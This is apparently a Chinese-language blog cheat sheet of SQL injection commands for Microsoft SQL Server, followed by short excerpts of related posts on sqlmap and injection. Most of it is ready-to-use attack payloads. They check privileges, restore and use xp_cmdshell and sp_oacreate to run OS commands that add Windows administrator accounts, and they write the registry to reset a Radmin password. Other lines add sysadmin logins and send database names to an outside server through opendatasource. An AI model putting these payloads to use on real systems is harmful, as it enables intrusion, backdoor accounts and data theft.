常用的注入命令

2021-04-29 19:24:42 字數 4718 閱讀 8155

//看看是什麼許可權的

and 1=(select is_member('db_owner'))

and char(124)%2bcast(is_member('db_owner') as varchar(1))%2bchar(124)=1 ;--

//檢測是否有讀取某資料庫的許可權

and 1= (select has_dbaccess('master'))

and char(124)%2bcast(has_dbaccess('master') as varchar(1))%2bchar(124)=1 --

數字型別

and char(124)%2buser%2bchar(124)=0

字元型別

' and char(124)%2buser%2bchar(124)=0 and ''='

搜尋型別

' and char(124)%2buser%2bchar(124)=0 and '%'='

爆使用者名稱

and user>0

' and user>0 and ''='

檢測是否為sa許可權

and 1=(select is_srvrolemember('sysadmin'));--

and char(124)%2bcast(is_srvrolemember(0x730079007300610064006d0069006e00) as varchar(1))%2bchar(124)=1 --

檢測是不是mssql資料庫

and exists (select * from sysobjects);--

檢測是否支援多行

;declare @d int;--

恢復 xp_cmdshell

;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--

select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')

//-----------------------

//      執行命令

//-----------------------

首先開啟沙盤模式:

exec master..xp_regwrite 'hkey_local_machine','software/microsoft/jet/4.0/engines','sandboxmode','reg_dword',1

然後利用jet.oledb執行系統命令

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/winnt/system32/ias/ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')

執行命令

;declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null, 'c:/winnt/system32/cmd.exe /c net user paf pafpaf /add';--

exec [master].[dbo].[xp_cmdshell] 'cmd /c md c:/1111'

判斷xp_cmdshell擴充套件儲存過程是否存在:

寫登錄檔

exec master..xp_regwrite 'hkey_local_machine','software/microsoft/jet/4.0/engines','sandboxmode','reg_dword',1

reg_sz

讀登錄檔

exec master..xp_regread 'hkey_local_machine','software/microsoft/windows nt/currentversion/winlogon','userinit'

讀取目錄內容

exec master..xp_dirtree 'c:/winnt/system32/',1,1

資料庫備份

backup database pubs to disk = 'c:/123.bak'

//爆出長度

and (select char(124)%2bcast(count(1) as varchar(8000))%2bchar(124) from d99_tmp)=0 ;--

更改sa口令方法:用sql綜合利用工具連線後,執行命令:

exec sp_password null,'新密碼','sa'

新增和刪除乙個sa許可權的使用者test:

exec master.dbo.sp_addlogin test,ptlove

exec master.dbo.sp_addsrvrolemember test,sysadmin

刪除擴充套件儲存過過程xp_cmdshell的語句:

exec sp_dropextendedproc 'xp_cmdshell'

新增擴充套件儲存過過程

exec [master]..sp_addextendedproc 'xp_proxiedadata', 'c:/winnt/system32/sqllog.dll'

grant exec on xp_proxiedadata to public

停掉或啟用某個服務。

exec master..xp_servicecontrol 'stop','schedule'

exec master..xp_servicecontrol 'start','schedule'

dbo.xp_subdirs

只列某個目錄下的子目錄。

xp_getfiledetails 'c:/inetpub/wwwroot/sqlinject/login.asp'

dbo.xp_makecab

將目標多個檔案壓縮到某個目標檔案之內。

所有要壓縮的檔案都可以接在引數列的最後方,以逗號隔開。

dbo.xp_makecab

'c:/test.cab','mszip',1,

'c:/inetpub/wwwroot/sqlinject/login.asp',

'c:/inetpub/wwwroot/sqlinject/securelogin.asp'

xp_terminate_process

停掉某個執行中的程式,但賦予的引數是 process id。

利用」任務管理器」,透過選單「檢視」-「選擇字段」勾選 pid,就可以看到每個執行程式的 process id

xp_terminate_process 2484

xp_unpackcab

解開壓縮檔。

xp_unpackcab 'c:/test.cab','c:/temp',1

某機,安裝了radmin,密碼被修改了,regedit.exe不知道被刪除了還是被改名了,net.exe不存在,沒有辦法使用regedit /e 匯入註冊檔案,但是mssql是sa許可權,使用如下命令 exec master.dbo.xp_regwrite 'hkey_local_machine','system/radmin/v2.0/server/parameters','parameter','reg_binary',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密碼為12345678。如果要修改埠值 exec master.dbo.xp_regwrite 'hkey_local_machine','system/radmin/v2.0/server/parameters','port','reg_binary',0xd20400 則埠值改為1234

create database lcx;

create table ku(name nvarchar(256) null);

create table biao(id int null,name nvarchar(256) null);

//得到資料庫名

insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases

//在master中建立表,看看許可權怎樣

create table master..d_test(id nvarchar(4000) null,data nvarchar(4000) null);--

用 sp_makewebtask直接在web目錄裡寫入一句話馬:

//更新表內容

update films set kind = 'dramatic' where id = 123

//刪除內容

delete from table_name where stockid = 3

sqlmap的注入使用常用命令

sqlmap的注入使用 sqlmap是一款強大的注入工具,相比經典的啊d和明小子之類的注入工具,sqlmap功能更加強大,無論是自帶字典,功能還是介面優化,都是一款非常不錯的注入工具,sqlmap可以多平台 執行,windows,linux下都可以進行access,mysql,mssql等資料庫的注...

命令注入 漏洞修復 OpenSSH 命令注入漏洞

cnnvd編號 cnnvd 202007 1519 危害等級 高危 cve編號 cve 2020 15778 漏洞型別 作業系統命令注入 威脅型別 本地 漏洞簡介 openssh openbsd secure shell 是openbsd計畫組的一套用於安全訪問遠端計算機的連線工具。該工具是ssh協...

SQL注入手工注入常用的語句

判斷是否存在注入 and 1 1 and 1 2 回顯頁面不同 整形判斷 輸入and 1 1和and 1 2後發現頁面沒有變化,判斷不是整型注入 輸入 and 1 1 23和 and 1 2 23後發現頁面變化,判斷為字元注入 在資料庫中 1 1 和1 2 後面隨便輸入字串 相當於1 1和1 2後面...